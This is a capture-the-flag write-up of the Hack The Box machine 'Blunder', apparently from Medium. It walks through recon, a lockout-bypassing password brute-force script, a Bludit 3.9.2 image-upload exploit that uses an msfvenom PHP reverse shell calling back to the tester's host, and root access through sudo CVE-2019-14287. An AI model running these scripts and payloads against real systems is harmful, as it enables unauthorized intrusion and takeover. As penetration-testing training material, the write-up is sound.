[HTB] Blunder — Writeup

Recon

Nmap

$ nmap -Pn — open -p- -sC -sV 10.10.10.191Starting Nmap 7.80 ( https://nmap.org ) at 2020–10–24 14:25 EDTNmap scan report for 10.10.10.191Host is up (0.081s latency).Not shown: 65533 filtered ports, 1 closed portSome closed ports may be reported as filtered due to — defeat-rst-ratelimitPORT STATE SERVICE VERSION80/tcp open http Apache httpd 2.4.41 ((Ubuntu))|_http-generator: Blunder|_http-server-header: Apache/2.4.41 (Ubuntu)|_http-title: Blunder | A blunder of interesting factsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 117.15 seconds

Interesting Ports

Dirsearch

$ python3 dirsearch.py -u http://10.10.10.191/ -e txt,php,asp,js | grep 200[15:41:45] 200–563B — /.gitignore[15:41:55] 200–3KB — /about[15:42:00] 200–2KB — /admin/[15:42:51] 200–30B — /install.php[15:42:54] 200–1KB — /LICENSE[15:43:13] 200–3KB — /README.md[15:43:14] 200–22B — /robots.txt

FFUF

$ ./ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -e .txt -u http://10.10.10.191/FUZZ -fc 403:: Method : GET:: URL : http://10.10.10.191/FUZZ:: Extensions : .txt:: Follow redirects : false:: Calibration : false:: Timeout : 10:: Threads : 40:: Matcher : Response status: 200,204,301,302,307,401,403:: Filter : Response status: 403________________________________________________LICENSE [Status: 200, Size: 1083, Words: 155, Lines: 22]about [Status: 200, Size: 3280, Words: 225, Lines: 106]admin [Status: 301, Size: 0, Words: 1, Lines: 1]cgi-bin/ [Status: 301, Size: 0, Words: 1, Lines: 1]robots.txt [Status: 200, Size: 22, Words: 3, Lines: 2]robots.txt [Status: 200, Size: 22, Words: 3, Lines: 2]todo.txt [Status: 200, Size: 118, Words: 20, Lines: 5]

Initial Foothold

Password Brute-forcing

public function getUserIp(){if (getenv(‘HTTP_X_FORWARDED_FOR’)) {$ip = getenv(‘HTTP_X_FORWARDED_FOR’);} elseif (getenv(‘HTTP_CLIENT_IP’)) {$ip = getenv(‘HTTP_CLIENT_IP’);} else {$ip = getenv(‘REMOTE_ADDR’);}return $ip;}
# cewl http://10.10.10.191 > tmp && cewl http://10.10.10.191/about >> tmp && sort -u tmp > passList.txt```I modified the provided POC script in order to supply the password file. Using this script, I was ablt to obtain the password for the user `fergus`.
#!/usr/bin/env python3import reimport requestshost = ‘http://10.10.10.191'login_url = host + ‘/admin/login’username = ‘fergus’wordlist = []with open(‘passList.txt’) as fp:line = fp.read().splitlines()for password in line:session = requests.Session()login_page = session.get(login_url)csrf_token = re.search(‘input.+?name=”tokenCSRF”.+?value=”(.+?)”’, login_page.text).group(1)print(‘[INFO] Trying: {p}’.format(p = password))headers = {‘X-Forwarded-For’: password,‘User-Agent’: ‘Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36’,‘Referer’: login_url}data = {‘tokenCSRF’: csrf_token,‘username’: username,‘password’: password,‘save’: ‘’}login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)if ‘location’ in login_result.headers:if ‘/admin/dashboard’ in login_result.headers[‘location’]:print()print(‘[INFO] SUCCESS: Password found!’)print(‘[INFO] Use {u}:{p} to login.’.format(u = username, p = password))print()break

Bludit 3.9.2 — Directory Traversal Image Upload

### Creating evil.png$ msfvenom -p php/reverse_php LHOST=10.10.14.15 LPORT=443 -f raw -b ‘“‘ > evil.png$ echo -e “<?php $(cat evil.png)” > evil.png### Creating .htaccess$ echo “RewriteEngine off” > .htaccess$ echo “AddType application/x-httpd-php .png” >> .htaccess
…snip…url = ‘http://10.10.10.191' # CHANGE MEusername = ‘fergus’ # CHANGE MEpassword = ‘RolandDeschain’ # CHANGE ME…snip…
$ python3 poc.pycookie: 335s5kf5clu2j8pe3oe23k93k1csrf_token: ef167ea5717fc72c4359195bd051aaf3495918aeUploading payload: evil.pngUploading payload: .htaccess

Privilege Escalation

www-data → hugo (user.txt)

# hash-identifierHASH: faca404fd5c0a31cf1897b823c695c85cffeb98dPossible Hashs:[+] SHA-1[+] MySQL5 — SHA-1(SHA-1($pass))
msf5 exploit(linux/http/bludit_upload_images_exec) > optionsModule options (exploit/linux/http/bludit_upload_images_exec):Name Current Setting Required Description— — — — — — — — — — — — — — — — — — — -BLUDITPASS RolandDeschain yes The password for BluditBLUDITUSER fergus yes The username for BluditProxies no A proxy chain of format type:host:port[,type:host:port][…]RHOSTS 10.10.10.191 yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>’RPORT 80 yes The target port (TCP)SSL false no Negotiate SSL/TLS for outgoing connectionsTARGETURI / yes The base path for BluditVHOST no HTTP server virtual hostPayload options (php/meterpreter/reverse_tcp):Name Current Setting Required Description— — — — — — — — — — — — — — — — — — — -LHOST 10.10.14.15 yes The listen address (an interface may be specified)LPORT 443 yes The listen portExploit target:Id Name— — —0 Bludit v3.9.2
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ su -l hugosu -l hugoPassword: Password120hugo@blunder:~$ lslsDesktop Downloads Pictures Templates VideosDocuments Music Public user.txthugo@blunder:~$ cat user.txtcat user.txt18941d126772300c8ea22297f4cd66e6

hugo → root (CVE-2019–14287)

hugo@blunder:~$ sudo -lsudo -lPassword: Password120Matching Defaults entries for hugo on blunder:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser hugo may run the following commands on blunder:(ALL, !root) /bin/bash
sudo -u#0 /bin/bashPassword: Password120Sorry, user hugo is not allowed to execute ‘/bin/bash’ as root on blunder.hugo@blunder:~$ sudo -u#-1 /bin/bashsudo -u#-1 /bin/bashPassword: Password120root@blunder:/home/hugo# ididuid=0(root) gid=1001(hugo) groups=1001(hugo)root@blunder:/home/hugo# cat /root/root.txtcat /root/root.txtf278317a8593bd7363e8de5b8b29d6a0

OSCE | OSCP | CREST | Offensive Security Consultant — All about Penetration Test | Red Team | Cloud Security | Web Application Security

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store